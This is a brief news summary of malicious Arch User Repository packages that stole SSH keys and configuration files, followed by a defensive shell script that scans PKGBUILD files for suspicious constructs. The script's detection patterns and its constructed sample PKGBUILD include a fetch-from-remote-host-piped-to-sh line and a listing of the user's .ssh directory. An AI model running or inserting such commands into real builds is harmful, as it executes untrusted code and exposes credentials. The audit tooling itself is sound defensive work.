
AI Summary
For the second time this week, malicious code has been discovered in the Arch User Repository. Learn how to audit your software and secure your system against these specific package vulnerabilities.
- Security researchers identified at least two malicious packages within the Arch User Repository (AUR) in the last seven days
- Affected packages were designed to exfiltrate sensitive system configuration files and SSH keys upon installation
- Users are advised to manually audit PKGBUILD files before building any software, as the community-driven nature of the repository lacks automated security vetting
The Arch User Repository (AUR) has been compromised by malicious software for the second time in a single week. Unlike official distribution repositories, the AUR relies on community maintenance and lacks centralized security verification, which allowed the harmful scripts to bypass standard checks. While developers have removed the identified threats, the exact scope of how many users may have been impacted remains unconfirmed. Arch Linux users can mitigate risk by inspecting build scripts before installation and avoiding packages with recent or suspicious upload histories.
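A heuristic first pass of the kind the advice above calls for, as an added example (not tooling from Arch Linux or the AUR): it greps a PKGBUILD for constructs that have no place in a normal build recipe and reports each one for manual review. The sample PKGBUILD is constructed for the demonstration, and the pattern list and reasons are illustrative assumptions, not a complete detection rule set.

```shell
#!/bin/sh
# Heuristic PKGBUILD audit to run before makepkg: prints one line per finding
# as "[reason] line N:text", ignores comment lines, and summarises to stderr.
# Added example with an illustrative pattern list; a clean report is not proof.

audit_pkgbuild() {
    f="$1"
    hits=0
    # Each heredoc line is "ERE pattern;reason" (';' appears in no pattern)
    while IFS=';' read -r pat reason; do
        [ -n "$pat" ] || continue
        # Match, then drop lines that are shell comments ("N:   # ...")
        found=$(grep -nE "$pat" "$f" | grep -vE '^[[:digit:]]+:[[:space:]]*#' || true)
        if [ -n "$found" ]; then
            printf '%s\n' "$found" | sed "s/^/[$reason] line /"
            hits=$((hits + $(printf '%s\n' "$found" | wc -l)))
        fi
    done <<'EOF'
(curl|wget)[[:space:]];network fetch inside a build step (makepkg fetches source= itself)
[|][[:space:]]*(ba)?sh([[:space:]]|$);remote or generated content piped into a shell
(^|[^[:alnum:]_])eval[[:space:]];eval of dynamically built code
base64[[:space:]]+(-d|--decode);decodes an embedded payload
\.ssh([^[:alnum:]]|$)|\.gnupg([^[:alnum:]]|$)|id_(rsa|ed25519);touches user credential files
sums=[(].*'SKIP';checksum verification disabled for a source
EOF
    printf '%s: %d finding(s)\n' "$f" "$hits" >&2
}

# Constructed sample PKGBUILD (not a real AUR package): a plausible recipe
# with a disabled checksum and two suspicious lines in package().
SAMPLE=$(mktemp)
trap 'rm -f "$SAMPLE"' EXIT
cat > "$SAMPLE" <<'EOF'
pkgname=demo-app
pkgver=1.0
pkgrel=1
arch=('any')
source=("https://example.invalid/demo-app-1.0.tar.gz")
sha256sums=('SKIP')
package() {
  install -Dm755 demo-app "$pkgdir/usr/bin/demo-app"
  # a comment mentioning curl is skipped by the audit
  curl -fsSL https://example.invalid/post-install | sh
  ls "$HOME/.ssh"
}
EOF
audit_pkgbuild "$SAMPLE"
```

Run it against the PKGBUILD and any `.install` file of a package before `makepkg -si`; every reported line deserves a look, and a zero-finding result still does not replace reading the recipe.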